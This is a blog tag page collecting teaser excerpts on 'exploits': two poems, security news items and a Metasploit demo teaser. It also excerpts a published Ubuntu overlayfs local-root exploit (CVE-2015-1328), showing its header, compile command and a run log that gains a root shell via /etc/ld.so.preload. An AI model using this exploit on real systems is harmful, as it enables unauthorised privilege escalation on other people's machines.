Tags » Exploit

Teen Gardens

Watch her garden grow Mister,

blue lakes, blue skies, blueberry pie;

Mister always kissin’ her pink rose,

Mister doesn’t pardon her red rose,

too much water, too much sun, too much fun; 6 more words

Poetry

The Man

#Questions

And all these words, the bullets and the fuel that keep this machine shooting and running in pace, should I thank you?

These I may forget, but never the pain you left, for you are the man who pulls the trigger and I am the fossil you exploit.

Poetry

How a crook could have taken over your Facebook pages

It’s the third bug of the year for Facebook bounty hunter Laxman Muthiyah.

At the start of 2015 he noticed that if you could view a photo album on Facebook, you could probably… 622 more words

Featured

[Exploit] Ubuntu 12.04, 14.04, 14.10, 15.04 - overlayfs Local Root (Shell)

# Exploit Title: ofs.c - overlayfs local root in ubuntu
# Date: 2015-06-15
# Exploit Author: rebel
# Version: Ubuntu 12.04, 14.04, 14.10, 15.04 (Kernels before 2015-06-15)
# Tested on: Ubuntu 12.04, 14.04, 14.10, 15.04
# CVE : CVE-2015-1328     (http://people.canonical.com/~ubuntu-security/cve/2015/CVE-2015-1328.html)
 
*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*
CVE-2015-1328 / ofs.c
overlayfs incorrect permission handling + FS_USERNS_MOUNT
 
user@ubuntu-server-1504:~$ uname -a
Linux ubuntu-server-1504 3.19.0-18-generic #18-Ubuntu SMP Tue May 19 18:31:35 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
user@ubuntu-server-1504:~$ gcc ofs.c -o ofs
user@ubuntu-server-1504:~$ id
uid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),30(dip),46(plugdev)
user@ubuntu-server-1504:~$ ./ofs
spawning threads
mount #1
mount #2
child threads done
/etc/ld.so.preload created
creating shared library
# id
uid=0(root) gid=0(root) groups=0(root),24(cdrom),30(dip),46(plugdev),1000(user)
 
greets to beist & kaliman
2015-05-24
… 689 more words
Exploit

Smart Refrigerators Leave Gmail Logins Vulnerable to Exploits

Penetration testers have discovered an exploit that could potentially steal Gmail credentials of a user whose information is available in a Samsung smart fridge.

Security researchers have uncovered a man-in-the-middle (MiTM) vulnerability that leaves Samsung smart refrigerators open to an exploit that allows an attacker to steal the owner’s Gmail credentials, reports… 377 more words

Privacy

Microsoft rolls out emergency fix for critical flaw affecting all versions of Internet Explorer

Microsoft has issued an emergency update to patch a critical vulnerability that affects all supported versions of Internet Explorer. If you haven’t already installed the fix, it’s recommended that you do so ASAP as hackers are said to be actively exploiting it. 224 more words

Microsoft

Five steps to have your own Metasploit and Oracle demo environment

Bingo! I’ve done it! I’ve got Metaspoit working against an Oracle database. And in this blogpost I’ll explain how you can do it too.

Step 0. 899 more words

Oracle Security